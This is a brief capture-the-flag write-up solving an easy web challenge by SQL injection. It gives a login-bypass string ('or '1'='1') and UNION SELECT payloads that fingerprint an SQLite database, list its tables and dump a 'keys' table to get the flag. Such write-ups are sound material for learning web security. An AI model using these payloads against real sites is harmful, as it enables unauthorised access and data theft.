This is just another appetizer.
First I login use
username: admin' or '1'='1 password: admin' or '1'='1
Then I got in it as root but see nothing, Seeing the header, there is the SQL query that made by me, It’s kindly like a SQLi problem.
a' UNION ALL SELECT sqlite_version() --
I see some number represent that the database behind the webpage is sqlite.
Then it is easy
a' UNION ALL SELECT name from sqlite_master --
babysfirst success! logged in as keys
a' UNION ALL SELECT * from keys --
You will get the key.